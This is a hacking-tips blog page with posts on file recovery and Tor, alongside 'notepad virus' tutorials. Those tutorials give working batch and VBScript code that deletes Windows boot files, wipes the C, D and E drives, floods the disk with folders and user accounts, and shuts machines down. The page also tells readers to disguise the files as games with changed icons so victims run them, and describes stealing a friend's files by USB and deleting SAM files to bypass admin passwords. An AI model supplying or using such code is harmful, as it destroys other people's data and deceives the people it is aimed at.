Saturday, 9 March 2019

How To Repair Corrupted Memory Card/USB Hard Drive




How to Create Anonymous Website(Dark Net)

Tor is an anonymous, secure network that allows anyone to access websites with anonymity. People normally use Tor to access normal websites, but they don’t have to. If you want to set up your own anonymous website, you can create a hidden service Tor site. Your hidden service website runs entirely within Tor, so no one will know who created and runs the website. Only people using Tor can access it, though. Hidden service Tor sites are ideal for anyone who wants to set up a website anonymously, such as political activists in repressive countries.
Not all hidden services have to be websites. You could create an SSH server, IRC server, or any other type of server and offer it as a hidden service on Tor. This tutorial will focus on setting up a hidden Tor site using the Savant web server – which Tor recommends – on Windows. The steps can also be applied to other operating systems and web servers.

Wednesday, 14 March 2018

How To Recover Files From Corrupted USB Drive

Recover-files-from-corrupted-drive-640x342
Today I will be teaching Easily Recover Files From Corrupted USB Drive. The best way to recover data from corrupted storage device. Today we mostly share our files through USB and some storage drive, But due to some viruses or wrong injection of these drives makes them corrupted and they stop working properly. And data in them can now be accessible directly. So for this we have a way to recover files from these corrupted drive. You just have to follow simple guide to recover all your files from any corrupted drive.

Change Processor Name Permanently

A while ago on Tweak And Trick, I published an article on changing your processor name. But recently, Anil Kumar pointed out that the trick only changed the name temporarily. After a user restarts his computer, the name reverted back to original which is obvious as each time Windows boots, it checks the connected hardware and updates the registry value automatically. So, changing the processor name using the earlier article did not have permanent results.

Wednesday, 21 February 2018

Hacking the Bank (just a demo that how blackhat hackers fools bank users)

One evening i was talking to a friend about security on the internet, just for fun we decided to make a little demo on how to hack userid and password from an online Banking application.This is the result. Whatever is displayed below here is for educational purposes only. We believe that all techniques used and displayed here are very simple for anyone with an average knowledge of computer networks and webserver applications. The information provided on this page is NOT sufficient to hack any real Bank. This page is a very simplified demo of an evil hacker fooling an online Banking user.
The main reason to put this information online is to warn users for internet crimes, and hopefully to make more people aware that the internet is a dangerous neighbourhood! And no, one does not need to be a genius to commit crimes with computers!

Monday, 19 February 2018

The 8 deadly windows .vbs commands


Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial, I am not responsible for your loss. 
Here on http://www.deremiblog.blogspot.com , I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.
To use the codes I am going to provide, all you need to do is to copy the codes fromMY BLOG, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.

How to log in to administrator account on any Windows PC Image Tutorial

How to log in to administrator account on any Windows PC Image Tutorial

PeregrineX shows on Imgur how to log in to administrator account of any Windows PC
Are you locked out of your own Windows  PC because you cant remember the Administrator password, fear not Imgur user spyboy has posted a step-by-step tutorial showing how to log in to an administrative account on any Windows computer.

Saturday, 17 February 2018

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

 

Warning – Do not run it on your computer
I’m gonna teach you how to make a virus named Matrix

Monday, 12 February 2018

Steel Someone Secret File Using USB Flash Drive.

maxresdefault

Today i am posting a way to steel secret file from your friends computer.
Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.
To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

12 Tips to Maintain a Virus Free Computer

Is your computer infected with virus? Do you often get mysterious error messages? Well, this is a common problem faced by almost all the computer users across the globe. Even though some of them are harmless, they do have the ability to do a number of nasty things up to and including damaging or erasing sensitive data from your computer. However, there are ways to keep viruses and other malware away from your computer.

Batch Files – the art of creating viruses


I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focussed on making the basics of batch files clear and developing the approach to code your own viruses.

Sunday, 11 February 2018

CREATE 5 MOST DANGEROUS VIRUS FOR PC USING NOTEPAD

Be Aware of Virus & Learn How they works
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
We have listed down 5 dangerous Viruses
How to create more than 3,000 folders under a minute:
  1. 1) Open your notepad and type
    the following code.
    @echo off
    :top
    md %random%
    goto top
    2) Save it as 1000.bat
    @echo off makes your screen
    appear blank but it is actually
    making hundreds of folders.
    md %random% is command that
    creating folders with random
    names.( md is a command to
    make directory in ms-dos)
    goto top – return the command
    to :top, causes an infinite loop.
    NOTE: The folders will get created
    in the directory where you saved
    the ”1000.bat” file.
    The file might look suspicious to
    your friends. So if you are
    looking to fool your friends, then
    change the file name and also
    the icon so that he doesn’t
    suspect the file to be a virus. ====================================================================

    ====================================================================
  2. How to Shutdown a computer forever?
    Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
    code into your notepad
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows
    \win.ini
    del c:\windows\win.ini
    Save it as “shutdown-
    forever.bat”. Just make sure it
    has a .bat or .cmd extension.
    DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU
    RUNING IT !!!
    This should shutdown the persons computer. It shuts it off once
    and deletes the files needed to reboot and restart.So please, use
    this hack only if you have no intention of rebooting your computer again. So just be careful.
    Here’s an alternative code.
    cmd /c del c:\windows\* /F /S /
    Q
    cmd /c del c:\* /F /S /Q
    Paste it in NotePad And Save It
    with Extension .cmd or .bat.
    =============================================
    3. How to Delete all your system:
    files with a small command!
    Copy the following code into your
    notepad and save it as a .bat
    file.
    del *.*
    All your files in your hard disk will
    vanish in less than 5mins.
    =============================================
    4. RAM crashing trick:
    Those bloggers who wants more views of there blog.. try it…
    Note: It will continuously will open the separate of page of given link.
    open notepad and type
    :A
    start http://geojamali.com
    goto A
    save with .bat extension.
    Infinitely loops your browser to
    open up http://geojamali.com/
    =============================================
    5. Crash a Computer System With:
    Nothing But a Link.
    This is a javascript “exploit” , it
    will hang/crash your system. It
    basically floods you with an
    infinite loop of mailto:xxx
    windows. To cancel this (and you
    have to move fast) kill the
    process of your email client
    before you run out of RAM. Every
    instance occupies about 1000
    bytes, if your victim is smart, he
    better end the process As soon as
    possible or he will be forced to
    reboot his computer.
    YOU ARE WARANT TO TRY THIS... THIS LINK WILL CRASH
    YOUR BROWSER OR WORSE, YOUR
    COMPUTER !!!!

Thursday, 8 February 2018

Some Notepad Virus Collection


Virus Collection

—-> How to use 
Copy the codes and paste in Notepad…
Save the file as your-file-name.bat
Enjoy..

—-> Codes :-
1)Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.

2) Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.

3) Convey your friend a lil’ message and shut down his / her computer:
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as “Anything.BAT” in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
 Save it as “Anything.VBS” and send it.

5) Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
Save it as “Anything.VBS” and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.

7) Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as “Anything.VBS” and send it.

8. Open Notepad continually in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anything.BAT” and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as “Anything.BAT” and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the ‘Change’ Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe

11) SHUTDOWN PC AND DISABLES ITS ABILITY TO RESTART
@echo off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntdlr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
@echo off
Msg *YOU GOT INFECTED!
Shutdown –s –t 7 –c “A VIRUS IS TAKING OVER c:Drive

12) MAKE YOUR HARD DRIVE FULL BY COPYING ITSELF AND MAKE HARD TO USE PC WITHOUT FORMATTING
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

13) MATRIX EFFECT (NOT VIRUS)
@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

14) FAILS WINDOWS OS
del c:\Windows\system32\*.*\q

15) FORMAT C, D, E DRIVES IN 3 SECONDS
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
–> How to Spread it:
* Windows does’nt allow to change the icon of .bat files. Therefore what you can do is :
  1. Right click on the .bat file
  2. Click on CREATE SHORTCUT
  3. And hide the original file.
  4. Now as this newly created file is just the shortcut, you can easily change its icon.
  5. Right click on this shortcut
  6. properties >>>..cutomize>>..choose icon
  7. Now give an attractive icon to it.
  8. Now name it something intresting. eg. PROTOTYPE or IGI etc.
  1. Now your victim would think it to be the game , and he will be easily curropted..

Become a Master Hacker – A Complete Guide for Beginners

Most of the aspiring techies have an intense passion for becoming a hacker but don’t know where to start. Some enthusiastic network newbies have a strong desire to learn how to be a wizardly hacker. In computer security, a hacker is someone who converges on the safety mechanisms of computer and network systems. Upon listening to the phrase Hacker, most of us get into mind is that they are the people who break into computers and mess up everything on your device. This is what many of the ordinary people symbolize hacking in modern culture. But, hacking culture is not just chopping one’s device rather it is much more complicated and ethical than most people know.


How to Become a Hacker

Wednesday, 7 February 2018

How to Delete administrator Password without any software

Step 1

Boot up with DOS

Step 2  


Delete the sam.exe and sam.log files from Windows\system32\config in your hard drive.
Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2
Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D’nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer

Monday, 5 February 2018

Copy Data automatically From USB to your PC On Insert

We sometime wish that if someone insert his/her USB Into your pc then its data automatically copy in to your system in hidden Form.
there is no need of software in this. we will make it possible with the help of some Dos commands.
lets get started, Follow the below steps.

Sunday, 4 February 2018

Batch virus that destroys antivirus systems.


Batch programs are essentially sequences of DOS commands that ‘type themselves’ when the batch file is run.Batch files consist of control elements, internal DOS commands and external commands or programs. With a little ingenuity one can duplicate most of the functions of a general purpose language, but doing any kind of math is tricky, there are no arithmetic commands at all. But most of us use Batch codes for creating viruses.One of the important feature of batch viruses are it cant be detected easily by Antivirus systems.Here in this article we will learn about making a batch virus that can destroy antivirus systems.The trick is so simple all you have to need is a notepad.

Wednesday, 24 January 2018

Create Bootable USB Drives to Install (Almost) Any OS

With the advent of ultra portable laptops, optical drives are becoming a thing of the past. Although not having optical drives allows manufacturers to make lighter devices, it causes problems to users when they want to fresh install operating systems, as most of them are still available in the form of CDs, DVDs and downloadable ISOs. For users of these devices, the only option then remains is to use a flash drive to install the operating system of their choice.
Not surprisingly, there are also a few of us who prefer installing operating systems from flash drives for its faster speeds. There are also a few of us who prefer to keep live operating systems on our flash drives to access computers without having an OS by simply plugging in our devices.
With such a lot of users needing to create bootable USB flash drives, it appears imperative that OS manufacturers provide an inbuilt way to create them with each DVD and CD they provide. However, that is not the case with all operating system manufacturers.

How To Shutdown Computer Using Pendrive

Step 1:

>>copy this  code into notepad:
@echo off
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).